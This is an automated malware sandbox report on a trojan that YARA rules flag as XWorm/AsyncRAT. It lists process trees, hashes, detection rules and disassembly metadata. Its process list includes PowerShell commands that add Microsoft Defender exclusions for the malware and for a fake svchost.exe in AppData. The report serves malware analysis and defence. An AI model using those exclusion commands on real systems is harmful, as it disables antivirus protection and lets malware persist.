                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff66e660000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:06:41:22
                                                                                        Start date:18/10/2024
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe'
                                                                                        Imagebase:0x910000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:06:41:23
                                                                                        Start date:18/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff66e660000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:06:41:28
                                                                                        Start date:18/10/2024
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe'
                                                                                        Imagebase:0x910000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:06:41:28
                                                                                        Start date:18/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff66e660000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:11
                                                                                        Start time:06:41:32
                                                                                        Start date:18/10/2024
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                                                        Imagebase:0x910000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:12
                                                                                        Start time:06:41:32
                                                                                        Start date:18/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff66e660000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:20
                                                                                        Start time:06:41:48
                                                                                        Start date:18/10/2024
                                                                                        Path:C:\Users\user\AppData\Local\svchost.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Local\svchost.exe"
                                                                                        Imagebase:0xcc0000
                                                                                        File size:135'376 bytes
                                                                                        MD5 hash:418F363765E0400FFA7E1FE93866DDEB
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000002.2656202645.000000000391C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000014.00000002.2656202645.000000000391C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000002.2656202645.0000000003947000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000014.00000002.2656202645.0000000003947000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000002.2655969773.00000000019F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000014.00000002.2655969773.00000000019F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000014.00000002.2655969773.00000000019F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000002.2656202645.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000014.00000002.2656202645.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 50%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:21
                                                                                        Start time:06:41:56
                                                                                        Start date:18/10/2024
                                                                                        Path:C:\Users\user\AppData\Local\svchost.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Local\svchost.exe"
                                                                                        Imagebase:0xb40000
                                                                                        File size:135'376 bytes
                                                                                        MD5 hash:418F363765E0400FFA7E1FE93866DDEB
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:24
                                                                                        Start time:06:44:33
                                                                                        Start date:18/10/2024
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                        Imagebase:0x7ff7403e0000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:25
                                                                                        Start time:06:44:33
                                                                                        Start date:18/10/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1436 -ip 1436
                                                                                        Imagebase:0x320000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:26
                                                                                        Start time:06:44:33
                                                                                        Start date:18/10/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 2424
                                                                                        Imagebase:0x320000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:16.1%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:72
                                                                                          Total number of Limit Nodes:11
                                                                                          execution_graph 10286 2896eb8 10287 2896efc RtlSetProcessIsCritical 10286->10287 10288 2896f59 10287->10288 10205 28970e0 10206 28970e4 10205->10206 10211 2897548 10206->10211 10216 2897498 10206->10216 10221 2897560 10206->10221 10226 289742f 10206->10226 10212 289751f 10211->10212 10213 2897546 10212->10213 10231 28979f0 10212->10231 10235 2897920 10212->10235 10213->10206 10218 28974a3 10216->10218 10217 2897546 10217->10206 10218->10217 10219 28979f0 4 API calls 10218->10219 10220 2897920 4 API calls 10218->10220 10219->10218 10220->10218 10222 289751f 10221->10222 10223 2897546 10221->10223 10222->10223 10224 28979f0 4 API calls 10222->10224 10225 2897920 4 API calls 10222->10225 10223->10206 10224->10222 10225->10222 10228 289746c 10226->10228 10227 2897546 10227->10206 10228->10227 10229 28979f0 4 API calls 10228->10229 10230 2897920 4 API calls 10228->10230 10229->10228 10230->10228 10232 2897a15 10231->10232 10239 2898251 10232->10239 10233 2897af6 10233->10233 10236 2897925 10235->10236 10238 2898251 4 API calls 10236->10238 10237 2897af6 10237->10237 10238->10237 10240 2898275 10239->10240 10244 289ced1 10240->10244 10248 289cee0 10240->10248 10241 28984d0 10241->10233 10245 289ceda 10244->10245 10252 289d0d1 10245->10252 10246 289cf66 10246->10241 10249 289cef0 10248->10249 10251 289d0d1 4 API calls 10249->10251 10250 289cf66 10250->10241 10251->10250 10257 289d118 10252->10257 10266 289d1a8 10252->10266 10274 289d109 10252->10274 10253 289d0ee 10253->10246 10258 289d125 10257->10258 10261 289d14d 10257->10261 10258->10253 10260 289d16e 10260->10253 10261->10260 10263 289d1c6 10261->10263 10282 28998b4 10261->10282 10262 289d1d3 10262->10253 10263->10262 10264 289d236 GlobalMemoryStatusEx 10263->10264 10265 289d266 10264->10265 10265->10253 10269 289d1c6 10266->10269 10273 289d151 10266->10273 10267 289d1d3 10267->10253 10268 28998b4 GlobalMemoryStatusEx 10268->10273 10269->10267 10271 289d236 GlobalMemoryStatusEx 10269->10271 10270 289d16e 10270->10253 10272 289d266 10271->10272 10272->10253 10273->10268 10273->10269 10273->10270 10277 289d118 10274->10277 10275 28998b4 GlobalMemoryStatusEx 10275->10277 10276 289d125 10276->10253 10277->10275 10277->10276 10278 289d1c6 10277->10278 10279 289d1d3 10278->10279 10280 289d236 GlobalMemoryStatusEx 10278->10280 10279->10253 10281 289d266 10280->10281 10281->10253 10283 289d1f0 GlobalMemoryStatusEx 10282->10283 10285 289d266 10283->10285 10285->10261 10289 2896f90 10290 2897498 4 API calls 10289->10290 10291 2896f96 10290->10291

                                                                                          Executed Functions

                                                                                          Function 028923C8 Relevance: 3.0, Strings: 2, Instructions: 451COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 160 28923c8-28923eb 161 28923f1-289251a 160->161 162 2892957-2892a52 160->162 209 289251c 161->209 210 2892523-2892582 call 2892e30 call 2890300 call 2890310 161->210 209->210 221 2892593-28925a2 210->221 222 2892584-289258c 210->222 225 28925c4-28926d5 call 2890320 call 2890330 221->225 226 28925a4-28925be call 2890300 221->226 222->221 250 28926db-28926ff call 2893d62 225->250 251 2892850-2892863 225->251 226->225 254 289274d-2892776 call 28956f0 250->254 255 2892701-2892708 250->255 262 2892868-289286e 251->262 266 2892778-289278b 254->266 267 289278d-28927a0 254->267 255->251 257 289270e-2892726 255->257 268 289272e-2892730 257->268 313 289286e call 2893068 262->313 314 289286e call 2892ff8 262->314 270 28927a8-28927d4 call 28956f0 266->270 267->270 315 28927a2 call 289571f 267->315 271 2892748-289274b 268->271 272 2892732-2892738 268->272 269 2892874-289287e 278 2892880 call 2896e29 269->278 279 2892886-289293d 269->279 284 28927eb-28927fe 270->284 285 28927d6-28927e9 270->285 271->254 274 289273a 272->274 275 289273c-289273e 272->275 274->271 275->271 278->279 306 2892945-2892956 279->306 286 2892806-289284e call 28967c8 call 2890340 284->286 308 2892800 call 289571f 284->308 285->286 286->262 308->286 313->269 314->269 315->270
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.4308640059.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: kjp^${jp^
                                                                                          • API String ID: 0-3900514427
                                                                                          • Opcode ID: bc2dbfa3591e0965d56d296c17b71aac55cc9581ba652918cf09db6af52b3766
                                                                                          • Instruction ID: 3324d31ad73fef630f2f32285171cc2e04090dfcd6a28520fc85d667376ed932
                                                                                          • Opcode Fuzzy Hash: bc2dbfa3591e0965d56d296c17b71aac55cc9581ba652918cf09db6af52b3766
                                                                                          • Instruction Fuzzy Hash: 2FF17034B003459FDB18AB79D868B6D7BB2FB89700F148468E506DB3A9DF719C01CBA1
                                                                                          Function 0289AEE0 Relevance: 2.8, Strings: 2, Instructions: 281COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 477 289aee0-289af46 479 289af48-289af53 477->479 480 289af90-289af92 477->480 479->480 482 289af55-289af61 479->482 481 289af94-289afad 480->481 489 289aff9-289affb 481->489 490 289afaf-289afbb 481->490 483 289af63-289af6d 482->483 484 289af84-289af8e 482->484 485 289af6f 483->485 486 289af71-289af80 483->486 484->481 485->486 486->486 488 289af82 486->488 488->484 491 289affd-289b055 489->491 490->489 492 289afbd-289afc9 490->492 501 289b09f-289b0a1 491->501 502 289b057-289b062 491->502 493 289afcb-289afd5 492->493 494 289afec-289aff7 492->494 496 289afd9-289afe8 493->496 497 289afd7 493->497 494->491 496->496 498 289afea 496->498 497->496 498->494 503 289b0a3-289b0bb 501->503 502->501 504 289b064-289b070 502->504 510 289b0bd-289b0c8 503->510 511 289b105-289b107 503->511 505 289b093-289b09d 504->505 506 289b072-289b07c 504->506 505->503 507 289b07e 506->507 508 289b080-289b08f 506->508 507->508 508->508 512 289b091 508->512 510->511 513 289b0ca-289b0d6 510->513 514 289b109-289b15a 511->514 512->505 515 289b0f9-289b103 513->515 516 289b0d8-289b0e2 513->516 522 289b160-289b16e 514->522 515->514 517 289b0e4 516->517 518 289b0e6-289b0f5 516->518 517->518 518->518 520 289b0f7 518->520 520->515 523 289b170-289b176 522->523 524 289b177-289b1d7 522->524 523->524 531 289b1d9-289b1dd 524->531 532 289b1e7-289b1eb 524->532 531->532 533 289b1df 531->533 534 289b1fb-289b1ff 532->534 535 289b1ed-289b1f1 532->535 533->532 537 289b20f-289b213 534->537 538 289b201-289b205 534->538 535->534 536 289b1f3 535->536 536->534 539 289b223-289b227 537->539 540 289b215-289b219 537->540 538->537 541 289b207-289b20a call 28936ec 538->541 543 289b229-289b22d 539->543 544 289b237-289b23b 539->544 540->539 542 289b21b-289b21e call 28936ec 540->542 541->537 542->539 543->544 547 289b22f-289b232 call 28936ec 543->547 548 289b24b-289b24f 544->548 549 289b23d-289b241 544->549 547->544 552 289b25f 548->552 553 289b251-289b255 548->553 549->548 551 289b243 549->551 551->548 555 289b260 552->555 553->552 554 289b257 553->554 554->552 555->555
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.4308640059.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6P$6P
                                                                                          • API String ID: 0-3411155718
                                                                                          • Opcode ID: b478011d8bf287a4756368ad8b3078066776655998a394abb03a50d54fb4bec3
                                                                                          • Instruction ID: a8b65e06b4b58defd0f1dfd4b3b0d833de0681d306194917052ce0a59cd88373
                                                                                          • Opcode Fuzzy Hash: b478011d8bf287a4756368ad8b3078066776655998a394abb03a50d54fb4bec3
                                                                                          • Instruction Fuzzy Hash: 2FB12D79E002098FDF14CFA9D9857AEBBF2BF88718F188129D419E7254EB749845CF81
                                                                                          Function 0289B7B0 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 752 289b7b0-289b816 754 289b818-289b823 752->754 755 289b860-289b862 752->755 754->755 757 289b825-289b831 754->757 756 289b864-289b87d 755->756 763 289b8c9-289b8cb 756->763 764 289b87f-289b88b 756->764 758 289b833-289b83d 757->758 759 289b854-289b85e 757->759 761 289b83f 758->761 762 289b841-289b850 758->762 759->756 761->762 762->762 765 289b852 762->765 767 289b8cd-289b8e5 763->767 764->763 766 289b88d-289b899 764->766 765->759 768 289b89b-289b8a5 766->768 769 289b8bc-289b8c7 766->769 774 289b92f-289b931 767->774 775 289b8e7-289b8f2 767->775 770 289b8a9-289b8b8 768->770 771 289b8a7 768->771 769->767 770->770 773 289b8ba 770->773 771->770 773->769 776 289b933-289b94b 774->776 775->774 777 289b8f4-289b900 775->777 784 289b94d-289b958 776->784 785 289b995-289b997 776->785 778 289b923-289b92d 777->778 779 289b902-289b90c 777->779 778->776 780 289b90e 779->780 781 289b910-289b91f 779->781 780->781 781->781 783 289b921 781->783 783->778 784->785 786 289b95a-289b966 784->786 787 289b999-289ba0c 785->787 788 289b989-289b993 786->788 789 289b968-289b972 786->789 796 289ba12-289ba20 787->796 788->787 791 289b974 789->791 792 289b976-289b985 789->792 791->792 792->792 793 289b987 792->793 793->788 797 289ba29-289ba89 796->797 798 289ba22-289ba28 796->798 805 289ba99-289ba9d 797->805 806 289ba8b-289ba8f 797->806 798->797 808 289baad-289bab1 805->808 809 289ba9f-289baa3 805->809 806->805 807 289ba91 806->807 807->805 811 289bac1-289bac5 808->811 812 289bab3-289bab7 808->812 809->808 810 289baa5 809->810 810->808 813 289bad5-289bad9 811->813 814 289bac7-289bacb 811->814 812->811 815 289bab9 812->815 817 289bae9-289baed 813->817 818 289badb-289badf 813->818 814->813 816 289bacd 814->816 815->811 816->813 820 289bafd 817->820 821 289baef-289baf3 817->821 818->817 819 289bae1-289bae4 call 28936ec 818->819 819->817 825 289bafe 820->825 821->820 823 289baf5-289baf8 call 28936ec 821->823 823->820 825->825
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.4308640059.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6P$6P
                                                                                          • API String ID: 0-3411155718
                                                                                          • Opcode ID: c90deb13644a6edaeb80242c20098b4555df845814e7e11121428b954742a688
                                                                                          • Instruction ID: 06ccb8f855fc6d567f307f2bb324ca2fc58ddda0d27df002f86d1c73ccdf8ae4
                                                                                          • Opcode Fuzzy Hash: c90deb13644a6edaeb80242c20098b4555df845814e7e11121428b954742a688
                                                                                          • Instruction Fuzzy Hash: F6B16F78E00209CFDF10CFA9E88579DBBF2AF88758F188529D419E7354EB749845CB81
                                                                                          Function 0289571F Relevance: 1.8, Strings: 1, Instructions: 599COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.4308640059.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ]
                                                                                          • API String ID: 0-3352871620
                                                                                          • Opcode ID: 8ed5405dd00a9e944319d749bdc338052782a27ec289e4b86cc91848c516a62a
                                                                                          • Instruction ID: e3f71059d56953e3e2f04947cc29aaf37a899ef6c1529807c58cb8673e49a5da
                                                                                          • Opcode Fuzzy Hash: 8ed5405dd00a9e944319d749bdc338052782a27ec289e4b86cc91848c516a62a
                                                                                          • Instruction Fuzzy Hash: 6E22AE38B002189FDF15EF69D854BBE7BA6AF88300F588069E50ADB395DB349D41CB61
                                                                                          Function 02895D18 Relevance: 1.7, Strings: 1, Instructions: 484COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.4308640059.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ]
                                                                                          • API String ID: 0-3352871620
                                                                                          • Opcode ID: 778d09034d89234effec4d0817643b80cc79dc654a96fdc0586472bb961e969a
                                                                                          • Instruction ID: 73d004608be0da06607e534297ca4e039a7b185e252c424c9272a23153a125dd
                                                                                          • Opcode Fuzzy Hash: 778d09034d89234effec4d0817643b80cc79dc654a96fdc0586472bb961e969a
                                                                                          • Instruction Fuzzy Hash: 5A027038B00228CFDF15DF64C854B6A7BA6AF84354F1980A9E909DB395DB31DC41CFA1
                                                                                          Function 02890AC1 Relevance: .2, Instructions: 236COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.4308640059.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: df09f729a9c89fa7a88aa71e44d12136fcb39638ea2a3da42d598e9345560f84
                                                                                          • Instruction ID: 0282490eec547ad78b9c83e113ca6580e66e7a205e2c976ffa6ef649c5058360
                                                                                          • Opcode Fuzzy Hash: df09f729a9c89fa7a88aa71e44d12136fcb39638ea2a3da42d598e9345560f84
                                                                                          • Instruction Fuzzy Hash: 51A1BE35E003098FCB05DFB4C8549EEBBB2FF89300B15C66AE515AB251EB70A949CF90
                                                                                          Function 02890848 Relevance: .2, Instructions: 181COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.4308640059.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6dfe6a85c21793df0166194014e453394681a8147b25b57b7aecd9300a42ad3f
                                                                                          • Instruction ID: f0452868864dbc156f52e18d95062a0ce94146f98edf6b8b0d84c315ce1a2f62
                                                                                          • Opcode Fuzzy Hash: 6dfe6a85c21793df0166194014e453394681a8147b25b57b7aecd9300a42ad3f
                                                                                          • Instruction Fuzzy Hash: CA611A38B00209CFDB14DB69D954B6EB7B6FF88715F1580A9E909EB365DB31D801CB90
                                                                                          Function 0289D118 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 135COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 117 289d118-289d123 118 289d14d-289d150 117->118 119 289d125-289d14c call 28998a8 117->119 121 289d151-289d16c call 28998b4 118->121 126 289d16e-289d171 121->126 127 289d172-289d1c4 121->127 127->121 132 289d1c6-289d1d1 127->132 133 289d1d3-289d1d6 132->133 134 289d1d7-289d264 GlobalMemoryStatusEx 132->134 138 289d26d-289d295 134->138 139 289d266-289d26c 134->139 139->138
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.4308640059.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6P
                                                                                          • API String ID: 0-465892130
                                                                                          • Opcode ID: 257623a2323ad70ad933faa38fdb763e0ff12813d4137cd328d8b0213894016d
                                                                                          • Instruction ID: ffdc1906ba18be2c259db91d736538e31c65cd83d54a729096dee95d00fdccb7
                                                                                          • Opcode Fuzzy Hash: 257623a2323ad70ad933faa38fdb763e0ff12813d4137cd328d8b0213894016d
                                                                                          • Instruction Fuzzy Hash: 4A412536D0475A8FCB10DFAAD8046DEFBB1AF89320F18816AD508E7341DB749845CBE1
                                                                                          Function 02896EB0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 142 2896eb0-2896ef4 144 2896efc-2896f57 RtlSetProcessIsCritical 142->144 145 2896f59 144->145 146 2896f5e-2896f86 144->146 145->146
                                                                                          APIs
                                                                                          • RtlSetProcessIsCritical.NTDLL(?,?), ref: 02896F4A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.4308640059.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalProcess
                                                                                          • String ID: 6P
                                                                                          • API String ID: 2695349919-465892130
                                                                                          • Opcode ID: cd220ea2d1b4ff6c1814387d4657afd18c6693292d9c3de7f1576da798cf52cc
                                                                                          • Instruction ID: bfad0acb64ab20d3f88ff5f60ac3d4b4a08723a6bf28b8037c0d0afcadc8288b
                                                                                          • Opcode Fuzzy Hash: cd220ea2d1b4ff6c1814387d4657afd18c6693292d9c3de7f1576da798cf52cc
                                                                                          • Instruction Fuzzy Hash: 60218CB6C01259CFDB10CFAAD484BEEBFF4AF48310F14815AE549A3240D378AA44CF61
                                                                                          Function 02896EB8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 148 2896eb8-2896f57 RtlSetProcessIsCritical 150 2896f59 148->150 151 2896f5e-2896f86 148->151 150->151
                                                                                          APIs
                                                                                          • RtlSetProcessIsCritical.NTDLL(?,?), ref: 02896F4A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.4308640059.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalProcess
                                                                                          • String ID: 6P
                                                                                          • API String ID: 2695349919-465892130
                                                                                          • Opcode ID: c5b120be390f421bcc090eae0caab1dfa53e9d72752d669844a0b889950fbfe2
                                                                                          • Instruction ID: 538458e70d30dc0048c90589082658bc94655c1800bbb2502703a89cea3877fd
                                                                                          • Opcode Fuzzy Hash: c5b120be390f421bcc090eae0caab1dfa53e9d72752d669844a0b889950fbfe2
                                                                                          • Instruction Fuzzy Hash: 93216DB6C01259CFDB10CF9AD480BEEFBF4AF48310F14805AE559A3640D378AA44CF61
                                                                                          Function 028998B4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 153 28998b4-289d264 GlobalMemoryStatusEx 156 289d26d-289d295 153->156 157 289d266-289d26c 153->157 157->156
                                                                                          APIs
                                                                                          • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0289D16A), ref: 0289D257
                                                                                          Strings
                                                                                          Memory Dump Source
